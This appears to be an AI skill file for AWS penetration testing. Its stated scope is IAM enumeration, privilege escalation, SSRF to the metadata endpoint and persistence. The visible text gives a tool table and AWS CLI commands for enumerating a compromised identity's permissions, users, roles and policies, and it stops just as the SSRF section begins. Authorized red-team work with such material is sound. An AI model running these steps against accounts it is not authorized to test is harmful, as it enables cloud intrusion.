Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
| Tool | Purpose | Installation |
|---|---|---|
| Pacu | AWS exploitation framework | git clone https://github.com/RhinoSecurityLabs/pacu |
| SkyArk | Shadow Admin discovery | Import-Module .\SkyArk.ps1 |
| Prowler | Security auditing | pip install prowler |
| ScoutSuite | Multi-cloud auditing | pip install scoutsuite |
| enumerate-iam | Permission enumeration | git clone https://github.com/andresriancho/enumerate-iam |
| Principal Mapper | IAM analysis | pip install principalmapper |
Identify the compromised identity and permissions:
# Check current identity
aws sts get-caller-identity
# Configure profile
aws configure --profile compromised
# List access keys
aws iam list-access-keys
# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
# List all users
aws iam list-users
# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER
# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER
# List inline policies
aws iam list-user-policies --user-name TARGET_USER
# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME
Exploit SSRF to access metadata endpoint (IMDSv1):
# Access metadata endpoint